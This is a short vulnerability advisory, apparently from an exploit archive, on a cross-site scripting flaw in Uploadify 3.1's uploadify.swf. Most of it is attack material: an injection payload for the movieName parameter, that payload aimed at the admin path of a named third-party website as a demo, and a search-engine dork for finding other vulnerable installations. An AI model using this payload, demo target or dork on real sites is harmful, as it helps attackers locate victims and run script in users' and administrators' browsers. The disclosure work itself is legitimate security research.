Uploadify version 3.1 suffers from a cross site scripting vulnerability.
38411749c2d75136e514ad041c7f18642108d6bc9818a5a12c50a6adc5c978b9
# Affected software:
# Type of vulnerability:
# URL: http://www.uploadify.com/
# Discovered by: Provensec
# Website: http://www.provensec.com
#version 3.1
# Proof of concept
uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf
demo
http://www.renders-dbz.com/admin/include/uploadify/uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf
dork:inurl:uploadify.swf ext:swf